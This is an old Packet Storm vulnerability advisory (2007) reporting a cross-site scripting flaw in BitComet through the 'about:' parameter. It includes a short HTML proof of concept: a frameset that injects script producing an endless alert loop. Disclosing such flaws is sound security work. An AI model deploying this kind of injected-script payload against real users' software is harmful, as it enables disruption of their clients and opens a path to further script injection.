bitcomet-xss.txt

2007-11-27T00:00:00
ID PACKETSTORM:61212
Type packetstorm
Reporter Juan Pablo Lopez Yacubian
Modified 2007-11-27T00:00:00

Description

                                        
                                            `The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the example that I am presenting is a page that runs a while with a msgbox infinity.  
  
Create an html file and paste the following code  
  
<html>  
  
<frameset rows="100%">  
  
<frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">  
  
  
</frameset>  
  
</html>  
`